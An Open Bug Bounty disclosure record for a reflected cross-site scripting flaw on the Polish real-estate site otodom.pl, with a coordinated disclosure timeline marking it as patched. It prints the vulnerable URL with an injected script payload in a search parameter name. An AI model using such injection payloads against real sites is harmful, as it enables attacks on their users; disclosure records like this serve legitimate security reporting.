otodom.pl XSS vulnerability

2017-08-01T23:18:00
ID OBB:273243
Type openbugbounty
Reporter amlnspqr
Modified 2017-09-05T04:43:00

Description

Vulnerable URL:
https://www.otodom.pl/sprzedaz/mieszkanie/?search[filter_float_'-alert('XSSPOSED')-']=xxx
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 5784
VIP website status:| Yes
Check otodom.pl SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 1 August, 2017 23:18 GMT
Generic security notifications sent to website owner| 1 August, 2017 23:21 GMT
Vulnerability details disclosed by researcher| 4 September, 2017 14:23 GMT
Vulnerability patched by the website owner| 5 September, 2017 04:43 GMT